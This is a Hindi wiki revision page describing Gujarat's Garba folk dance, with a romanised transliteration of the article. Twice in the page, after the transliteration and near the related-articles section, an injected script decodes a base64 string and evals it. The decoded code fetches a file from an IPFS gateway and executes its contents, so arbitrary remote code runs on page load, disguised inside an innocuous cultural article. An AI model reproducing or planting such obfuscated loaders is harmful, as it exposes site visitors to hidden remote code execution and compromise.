Difference between revisions of "गरबा नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:संस्कृति कोश (को हटा दिया गया हैं।))
Line 1: Line 1:
 
[[चित्र:Garba-Dance.jpg|thumb|250px|गरबा नृत्य, [[गुजरात]] <br />Garba Dance., Gujarat]]
 
[[चित्र:Garba-Dance.jpg|thumb|250px|गरबा नृत्य, [[गुजरात]] <br />Garba Dance., Gujarat]]
गरबा [[गुजरात]] राज्‍य का एक लोकप्रिय [[लोक नृत्य]] है, जो गीत, नृत्‍य और नाटक की समृद्ध परम्‍परा का निरुपण करता है। यह मिट्टी के मटके, जिसे गरबो कहते हैं, को पानी से भर कर इसके चारों ओर महिलाओं द्वारा किया जाने वाला नृत्‍य है। मटके के अंदर एक सुपारी और चाँदी का सिक्‍का रखा जाता है, जिसे कुम्‍भ कहते हैं। इसके ऊपर एक नारियल रखा जाता है। नृत्‍य करने वाली महिलाएँ मटके के चारों ओर गोल घूमती हैं और एक गायक तथा [[ढोलक]] या [[तबला]] बजाने वाला व्‍यक्ति संगीत देता है। प्रतिभागी एक निश्चित ताल पर तालियाँ बजाते हैं। गरबा नृत्‍य गुजराती महिलाओं द्वारा किया जाने वाला गोलाकार नृत्‍य रूप है और यह नृत्‍य [[नवरात्रि]], [[शरद पूर्णिमा]], [[बसंत पंचमी]], [[होली]] और अन्‍य उत्‍सवों में किया जाता है। 'गरबा' का जन्‍म एक दीपक के अनुसार किया गया है, जिसे गर्भदीप कहते हैं, जिसका अर्थ है मटके के अंदर रखा हुआ दीपक।  
+
'''गरबा नृत्य''' [[गुजरात]] राज्‍य का एक लोकप्रिय [[लोक नृत्य]] है, जो गीत, नृत्‍य और नाटक की समृद्ध परम्‍परा का निरुपण करता है। यह [[मिट्टी]] के मटके, जिसे गरबो कहते हैं, को पानी से भर कर इसके चारों ओर महिलाओं द्वारा किया जाने वाला नृत्‍य है। मटके के अंदर एक सुपारी और चाँदी का सिक्‍का रखा जाता है, जिसे कुम्‍भ कहते हैं। इसके ऊपर एक [[नारियल]] रखा जाता है। नृत्‍य करने वाली महिलाएँ मटके के चारों ओर गोल घूमती हैं और एक गायक तथा [[ढोलक]] या [[तबला]] बजाने वाला व्‍यक्ति [[संगीत]] देता है। प्रतिभागी एक निश्चित ताल पर तालियाँ बजाते हैं। गरबा नृत्‍य गुजराती महिलाओं द्वारा किया जाने वाला गोलाकार नृत्‍य रूप है और यह नृत्‍य [[नवरात्रि]], [[शरद पूर्णिमा]], [[बसंत पंचमी]], [[होली]] और अन्‍य उत्‍सवों में किया जाता है। 'गरबा' का जन्‍म एक [[दीपक]] के अनुसार किया गया है, जिसे गर्भदीप कहते हैं, जिसका अर्थ है मटके के अंदर रखा हुआ दीपक।  
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 05:42, 12 December 2011

[[chitr:Garba-Dance.jpg|thumb|250px|garaba nrity, gujarat
Garba Dance., Gujarat]] garaba nrity gujarat rajh‍y ka ek lokapriy lok nrity hai, jo git, nrith‍y aur natak ki samriddh paramh‍para ka nirupan karata hai. yah mitti ke matake, jise garabo kahate haian, ko pani se bhar kar isake charoan or mahilaoan dvara kiya jane vala nrith‍y hai. matake ke aandar ek supari aur chaandi ka sikh‍ka rakha jata hai, jise kumh‍bh kahate haian. isake oopar ek nariyal rakha jata hai. nrith‍y karane vali mahilaean matake ke charoan or gol ghoomati haian aur ek gayak tatha dholak ya tabala bajane vala vh‍yakti sangit deta hai. pratibhagi ek nishchit tal par taliyaan bajate haian. garaba nrith‍y gujarati mahilaoan dvara kiya jane vala golakar nrith‍y roop hai aur yah nrith‍y navaratri, sharad poornima, basant panchami, holi aur anh‍y uth‍savoan mean kiya jata hai. 'garaba' ka janh‍m ek dipak ke anusar kiya gaya hai, jise garbhadip kahate haian, jisaka arth hai matake ke aandar rakha hua dipak.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>